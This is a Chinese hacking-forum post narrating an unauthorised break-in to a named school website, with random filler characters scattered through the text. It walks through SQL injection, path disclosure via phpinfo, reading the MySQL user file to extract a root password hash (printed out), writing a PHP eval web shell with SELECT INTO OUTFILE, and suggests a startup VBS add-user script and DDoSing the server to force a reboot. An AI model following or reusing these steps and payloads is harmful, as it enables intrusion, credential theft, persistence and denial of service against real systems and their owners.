第一眼看去,好像全是html静态的,都知道静态的根本不好日,多点击几个专栏; y# |. \ D' g' R% W
发现这个:http://www.dyyz.net.cn/celebrate/list.php?id=3 -0 -1 判断后确认存在注入!6 Y! j* o2 X7 O) c+ u/ w- a
' p6 Z" Q' y* @# A2 x0 P! Y6 [; r. ^2 d2 C
G& K& e' W4 g5 E0 x
常规手工不行,尝试突破也不行,利用穿山甲 可以注入:root权限
9 v# h+ q7 z X' x% k: l0 P
1 h7 w# F" W) p$ N那么想可以直接写入shell ,getshell有几个条件:+ }, x( J, q. l2 ~4 Y
1、知道站点物理路径 2、有足够大的权限 3、magic_quotes_gpc()=OFF " q, e( C _) q7 Y4 a. c* P
& E. I% D% o0 G0 L. K7 M试着爆绝对路径: / @$ a3 j6 J" X$ n) Z1 o7 c' r
1./phpMyAdmin/index.php?lang[]=1 / p, i$ w) ~- Y# w
2./phpMyAdmin/phpinfo.php
* ~! R# W6 H& n% F/ b h3./load_file()
+ b# V; O( U0 s$ H$ [! A2 `1 Q# a7 M4./phpmyadmin/themes/darkblue_orange/layout.inc.php " q* ^ s: m& v6 ^$ E9 K$ a- a
5./phpmyadmin/libraries/select_lang.lib.php
; ?/ v* ~+ k6 Q* K# R5 }6./phpmyadmin/libraries/lect_lang.lib.php
6 N+ n* z/ e) I; I7./phpmyadmin/libraries/mcrypt.lib.php % E5 w7 O( H1 h
8./phpmyadmin/libraries/export/xls.php J5 ^& Q' U8 @; U. H4 n: g
! O$ g% w" f6 N" { y2 w! P% O( p% `2 }6 f
均不行........................... * q# O2 {* ^- I& `
4 z7 }% P+ l0 \" o6 j O' Q+ @
御剑扫到这个: http://www.dyyz.net.cn//phpinfo.php 获得网站路径:D:/www/phpinfo.php
0 [ b: k& d F+ }
0 J% w# U- d: x1 M! S权限为root,知道网站路径,可是条件3不符合,没法写入shell ,不过服务器存在phpmyadmin
# k) Y: t, C4 C6 P" K: c9 o$ X$ @: t! v# V3 Q
默认不行,尝试万能密码:帐号 'localhost'@'@" 密码空 ,登录失败 ' e. [6 h$ I+ c. O# C
# q/ S {: x2 `" B
敏感东西: http://202.103.49.66/Admincp.php 社工进不去........... 7 I8 G' G! [- x! M- E
( g' P* K$ v. B. X2 H想想root还可以读,读到root密码进phpmyadmin 也可以拿shell
3 Q4 b' ^2 O' O1 k' H) ]- S% j. D6 ?% V8 E N
http://www.dyyz.net.cn//phpinfo.php 泄露了D:\phpStudy\PHP5\php.ini
9 n" K J [3 {" s/ @7 l' N+ {6 z2 L; f. O3 ?9 L
自己修改好读root密码的路径:D:\phpStudy\MySQL\Data\mysql\user.MYD ( E/ ^! r+ d) {1 q% U& M
) k; h6 P1 D- x$ y0 u1 n成功读到root密码:
, U1 Q' y" u. u$ k& W2 h* v2 |4 ~1 q s! E# ]* ]3 b
17---- r(0072) + J' E0 X% S8 o+ Q- ?: V0 _
18---- o(006f) - [( h, W, V4 {" j$ Z9 _. S' z
19---- o(006f) 2 W) b7 h4 T& D- I3 ^, B- A$ Q
20---- t(0074) & ]$ ^' H7 c9 \: ^( q$ W) A
21---- *(002a)
% X( i$ L$ F# g8 z22---- 8(0038) 3 u6 u3 M/ p0 i$ y4 G
23---- 2(0032)
+ ~. z! h& i+ {, i" f24---- E(0045)
- j3 l2 d" k( x; C0 u8 a25---- 1(0031) : S9 g0 x2 h ?
26---- C(0043) 0 h9 N7 N2 U3 K5 G7 H6 a1 `
27---- 5(0035)
+ ^6 U& @0 l' @& U5 w2 x; N. E28---- 8(0038) . \2 f3 o) w. z; t6 V5 V
29---- 2(0032) 1 |* u$ r$ w. W) T
30---- 8(0038) ( A. m+ d; j4 ?( v% d/ v7 k) ~
31---- A(0041)
2 n& _+ b1 S. }% W; K! H& R32---- 9(0039) / R3 ^& P1 P; M6 m. I. d
33---- B(0042)
# g6 h3 i( i9 `8 F6 m* u34---- 5(0035)
7 u) Z4 ?$ F( w5 U, Z35---- 4(0034)
8 R+ ^; D! Q1 B0 v0 D36---- 8(0038)
! z/ S& a) ^ z37---- 6(0036) 0 M, h9 \* @0 e6 d4 E
38---- 4(0034) . I8 ]: z$ Z1 }
39---- 9(0039)
6 R8 ]7 T5 [- e+ k1 u8 F r9 \/ Q40---- 1(0031) 4 N) u& M9 n+ N& C4 \
41---- 1(0031)
% ?5 }! F+ s6 P+ l42---- 5(0035) # ]3 s* r$ _& ]7 g) e/ h
43---- 3(0033) 0 u6 Q0 I) i2 U: a6 l( y
44---- 5(0035) 5 J0 s7 l0 v: t% e
45---- 9(0039)
6 ^6 J1 J" J0 V S9 }+ Q8 F46---- 8(0038)
, L% B2 O" ~4 s47---- F(0046)
7 y# _+ X. a* w7 t8 `% \# T48---- F(0046) * C0 L+ Y/ ^, f7 U$ P, U$ K) s1 Q
49---- 4(0034) / u% S% a, ^! d2 M) Y7 J$ k
50---- F(0046)
, I& |$ b+ b! J4 o) w+ D; M51---- 0(0030) ) K' L; ?7 i# f, M2 I: {; Q( ?
52---- 3(0033) 6 @8 ^4 _- J. L2 C; X
53---- 2(0032) 7 J5 G: o! X v. @4 b6 x/ d6 r
54---- A(0041) 4 U% P% M6 ]( {2 f: |: @
55---- 4(0034)
( `* J2 ^# {* z4 y$ X! @56---- A(0041) 0 Y$ |; Q# H: Y. }! l3 y, p! b5 @
57---- B(0042)
- ^, e0 @; H; S58---- *(0044) + U' f& A( B) N( d+ L$ X5 [, |" e
59---- *(0035)
% d9 h. B3 K, a: A60---- *(0041) 8 q/ G1 i6 g/ z3 U$ k
61---- *0032)
! l; O# t! A- V/ Z3 w% R* M
- u6 x2 Z6 ` J% I% o7 z; K$ V2 u/ S解密后成功登陆phpmyamin ' `4 g; c1 Q7 h l6 l7 `& K. }$ L
$ M f( h" s; I: v" z1 Z+ ^
1 v# |* |9 {( k4 e
+ j0 [8 R0 @7 K, f9 S$ A- U
8 q& u, T6 x w2 Q
找到mysql数据库,执行sql语句:elect '<?php @eval($_POST[pass]);?>'INTO OUTFILE 'd:/wamp/www/daxia.php'
7 k/ r. M/ W b# |& N/ K# S8 b% E. q# Z! H2 F, b" t% {: L
成功执行,拿下shell,菜刀连接:
3 ]0 s4 h1 o L; J- E# F. r
. y: H* O a6 m& A服务器不支持asp,aspx,php提权无果...................
" c6 V: a" {. U0 D5 z6 @/ m/ O- X1 @+ M
但服务器权限很松,上传个远控小马或是一个添加用户的vbs程序到启动里: ; g% [2 E0 S0 O W S2 v7 T
服务器上已经有个隐藏帐号了 ; ~- h3 Q3 G& A2 u
别名 administrators
- o5 x4 b0 k5 O5 S/ q; Z注释 管理员对计算机/域有不受限制的完全访问权 + @8 m% [- B# k0 Q$ R
成员 $ u! ?& e8 k! @$ R
-------------------------------------------------------------------------------
; t q, Y* p1 O' @3 k* S3 T+ Xadmin! r: u5 \& D% {; E
Administrator
+ U& T5 B1 x# W V a% U, xslipper$
$ l+ l# `2 d7 p6 Y2 }% hsqluser
. M8 k) ?4 c3 [2 r, I+ w命令成功完成。 & f2 `/ r. ]/ Z2 S( k* r
c4 l* X# X% H8 F2 F* A! z
服务器权限很松,上传个vbs添加用户的到启动,不要用bat,会开机的时候显示运行批处理的。
. S" t+ @5 H; @( c5 Z ]! R8 e# b9 ~7 ?6 N+ J) ?3 w
ddos服务器重启,不然就只能坐等服务器重启了...............................
# C8 |% ?9 H$ o7 o4 v% X W# r$ M1 n5 S( {
& C; y1 ~" z E3 z) c4 }5 L | 
发表于 2013-1-11 21:32:15
收藏
支持
反对
发表于 2013-5-20 15:28:12
